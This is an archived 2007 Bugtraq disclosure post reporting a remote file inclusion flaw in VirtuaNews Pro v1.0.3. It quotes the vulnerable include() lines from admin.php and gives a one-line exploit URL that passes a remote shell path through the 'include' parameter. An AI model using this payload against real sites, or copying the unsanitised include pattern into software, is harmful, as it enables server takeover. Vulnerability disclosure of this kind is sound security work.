lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070425200515.4673.qmail@securityfocus.com> Date: 25 Apr 2007 20:05:15 -0000 From: s433d_only_linux@...oo.de To: bugtraq@...urityfocus.com Subject: VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include #################################################### VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include DownloasScript: http://www.virtuanews.co.uk ################################################### Affected Software .: VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Download..: http://www.virtuanews.co.uk Risk ..............: high Date .........: 25/4/2007 Found by ..........: s433d_only_linux Contact ...........: s433d_only_linux (at) yahoo (dot) de [email concealed] Web .............: Www.hackerz.ir special thanx ........... Ali Jasbi my beste friend ##################################################### Affected File: upload/admin.php include($admindirectory."/".$key.".php"); upload/admin.php include($admindirectory."/".$val.".php"); ##################################################### Explit: http://seit.com/upload/admin.php?include=shell?